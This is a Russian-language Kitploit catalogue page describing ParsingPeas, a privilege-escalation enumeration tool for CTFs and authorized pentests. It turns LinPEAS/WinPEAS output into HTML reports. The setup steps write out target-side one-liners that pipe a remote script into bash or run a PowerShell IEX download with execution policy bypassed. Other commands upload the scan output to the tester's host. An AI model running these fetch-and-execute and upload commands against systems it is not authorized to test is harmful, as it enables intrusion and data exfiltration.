Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
ParsingPeas — HTML-парсер для вывода PEAS с дополнительными функциями | Kitploit
Инструменты/GitHubGitHub/yuvalmil/parsingpeas
Повышение привилегийСкриптинг и автоматизацияСбор информацииПост-эксплуатацияCTFТестирование на ПроникновениеУтилиты и фреймворкиОбучение и ОбразованиеЛаборатории и Практика
GitHubyuvalmil/parsingpeas

ParsingPeas

HTML-парсер для вывода PEAS с дополнительными функциями

159141 месяц назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий

ParsingPeas 🥒

Автоматизированный сбор PEASS + чистый, портативный HTML-отчёт для CTF и лабораторных работ по повышению привилегий.

License: MIT Python 3.8+

Выполните одну команду на целевой системе. ParsingPeas загружает LinPEAS/WinPEAS с вашего Kali, запускает сканирование, пересылает результат обратно и превращает его в единый автономный HTML-отчёт, который можно читать, искать, анализировать и сохранять — без ручной передачи файлов и без интернета на целевой машине.


Скриншоты

Сводка отчёта — разделы, сгруппированные по категориям LinPEAS, с точками находок и панелью находок:

Сводка отчёта

Только находки — одним кликом фильтруется отчёт и боковая панель, показывая только разделы с критическими/высокими находками:

Только находки

Полный вывод терминала — полное, с сохранением цветов сканирование; доступен поиск через Ctrl-F:

Полный вывод терминала


Зачем это нужно

Сырой вывод PEASS — это стена прокручиваемого текста в терминале, которая исчезает, как только ваша оболочка умирает. ParsingPeas:

  • Автоматизирует рутину — никаких scp, размещения linpeas у себя, копирования вывода обратно в Kali.
  • Сохраняет его — каждое сканирование становится HTML-отчётом с временной меткой на вашем хосте.
  • Делает его навигабельным — вывод разбит на реальные разделы LinPEAS с категоризированной боковой панелью, подсветкой находок и полнотекстовым поиском.
  • Удобен для переноски — каждый отчёт представляет собой один автономный .html-файл, который можно скопировать с машины, архивировать или открыть офлайн двойным щелчком.

Это представление + логистика, а не движок эксплойтов: он точно сохраняет собственную расцветку и обозначения PEASS, а не гадает, что есть что.


Особенности

  • Работа по одной команде — целевая система загружает обёртку с вашего хоста, запускает PEASS и автоматически отправляет результат методом POST.
  • Работает офлайн на целевой машине — всё раздаётся с вашего Kali.
  • Точный разбор разделов — следует реальной двухуровневой иерархии заголовков LinPEAS (основные разделы + подпроверки); ссылки на hacktricks и строки проверок остаются содержимым, не засоряя оглавление.
  • Автономные отчёты — вывод терминала встроен в файл; один файл, без бочков, открывается через file://.
  • Интерактивный просмотр отчёта:
    • Оглавление на боковой панели, сгруппированное по разделам PEASS, счётчиками критических/высоких находок.
    • Панель находок — чипы N критических / N высоких, позволяющие перепрыгивать между отмеченными разделами, плюс цветовая легенда.
    • Фильтр «только находки» для быстрого анализа.
    • Переключатель переноса строк (включён по умолчанию — больше нет обрезанных строк).
    • Scrollspy — текущий раздел подсвечивается в оглавлении при прокрутке.
    • Липкие заголовки разделов и точки «прочитано», которые сохраняются (localStorage, для каждого отчёта).
    • Значки в заголовке для текущего пользователя (красный, если root) и ОС.
  • Вкладка «Полный вывод терминала» — полное, с сохранением цветов сканирование, отрендеренное за один проход, чтобы браузерный Ctrl-F искал по всему содержимому.
  • Приглушённая тёмная тема — не утомляет глаза при длительной работе.
  • Linux и Windows — LinPEAS (bash) и WinPEAS (PowerShell).

Быстрый старт

На вашем Kali

root@kitploit:~
git clone https://github.com/YuvalMil/ParsingPeas.git
cd ParsingPeas
./setup.sh                      # загружает LinPEAS + WinPEAS в scripts/
pip3 install -r requirements.txt
python3 receiver.py             # раздаёт на http://0.0.0.0:8005

Оставьте receiver.py работать. Узнайте IP, по которому целевая система сможет до вас достучаться:

  • HTB / VPN: ваш адрес tun0 — ip -4 addr show tun0
  • Локальная сеть: IP вашего обычного интерфейса

На целевой системе

Linux/Unix (использует curl, при неудаче — wget):

root@kitploit:~
curl -sSL http://ВАШ_IP_KALI:8005/get-script | bash

Windows (PowerShell / реверс-шелл):

root@kitploit:~
powershell -ExecutionPolicy Bypass -Command "IEX(New-Object Net.WebClient).DownloadString('http://ВАШ_IP_KALI:8005/get-script.ps1')"

Выберите команду в зависимости от ОС цели — Linux поставляет LinPEAS, Windows — WinPEAS.

Просмотр отчёта

Отчёты создаются на вашем Kali в папке ./reports/. Вы можете:

  • Перейти к индексу по адресу http://ВАШ_IP_KALI:8005 и щёлкнуть отчёт, или
  • Открыть сгенерированный файл напрямую — он автономен:
    root@kitploit:~
    xdg-open ./reports/report_<хост>_<время>.html
    

Скопируйте этот единственный .html-файл куда угодно; он работает сам по себе.


Как это работает

root@kitploit:~
Цель → загружает обёртку с Kali → запускает PEASS → отправляет вывод методом POST → Kali разбирает → автономный HTML-отчёт

Целевой системе никогда не нужен интернет — обёртка и бинарники PEASS раздаются с вашего хоста.


Использование отчёта

  • Вкладка «Сводка отчёта» — разделы, сгруппированные по категориям PEASS на боковой панели. Красные/жёлтые точки отмечают разделы с критическими/высокими находками. Используйте чипы Находки, чтобы перейти к ним, или Только находки, чтобы скрыть всё остальное.
  • Вкладка «Полный вывод терминала» — полное цветное сканирование. Просто нажмите Ctrl-F для поиска; весь вывод отрендерен, так что нативный поиск покрывает всё.
  • Нажмите на точку находки, чтобы отметить раздел как прочитанный — он останется прочитанным при повторном открытии отчёта.

Ручное использование

Если однострочная команда не сработала, сделайте это вручную.

Linux:

root@kitploit:~
# На целевой системе
curl http://IP_KALI:8005/get-linpeas -o /tmp/lp.sh
chmod +x /tmp/lp.sh
/tmp/lp.sh > /tmp/out.txt
# Отправить обратно
curl -X POST -H "X-Hostname: $(hostname)" -H "X-Scan-Type: linpeas" \
  --data-binary @/tmp/out.txt http://IP_KALI:8005/upload

Windows (PowerShell):

root@kitploit:~
Invoke-WebRequest -Uri http://IP_KALI:8005/get-winpeas -OutFile $env:TEMP\wp.exe
& "$env:TEMP\wp.exe" > $env:TEMP\out.txt
Invoke-WebRequest -Uri http://IP_KALI:8005/upload -Method POST `
  -Headers @{"X-Hostname"=$env:COMPUTERNAME; "X-Scan-Type"="winpeas"} `
  -InFile $env:TEMP\out.txt

Разобрать уже имеющийся дамп PEASS:

root@kitploit:~
python3 parser.py /путь/к/peas_output.txt   # создаёт HTML-отчёт в ./reports/

Настройка

Отредактируйте начало receiver.py:


Устранение неполадок

  • Не удаётся загрузить скрипт? Выполните curl http://IP_KALI:8005/health, чтобы проверить связь; откройте фаервол sudo ufw allow 8005/tcp.
  • 404 на /get-linpeas? Выполните ./setup.sh, чтобы загрузить бинарники PEASS.
  • Нет живого вывода в реверс-шелле PowerShell? Это ожидаемо — сканирование всё равно выполняется; следите за подтверждением загрузки в приёмнике.

Безопасность

⚠️ Только для авторизованного пентестинга, CTF и лабораторного использования.

  • Нет аутентификации — запускайте только в изолированных/CTF-сетях, за фаерволом.
  • Значения заголовков загрузки санируются, размер загрузок ограничен, но сервер не защищён для работы в открытом интернете.

Благодарности

Построено на PEASS-ng от @carlospolop. ParsingPeas только собирает и представляет его вывод.


Лицензия MIT · Вклады приветствуются

Скачать инструмент
ПараметрПо умолчаниюПримечание
Порт8005измените строку app.run(... port=...)
OUTPUT_DIR./received_outputsпапка для загруженных сканов
REPORTS_DIR./reportsпапка для сгенерированных HTML-отчётов
SCRIPTS_DIR./scriptsпапка с бинарниками LinPEAS/WinPEAS
MAX_UPLOAD_SIZE10 МБпринудительно — загрузки большего размера получают HTTP 413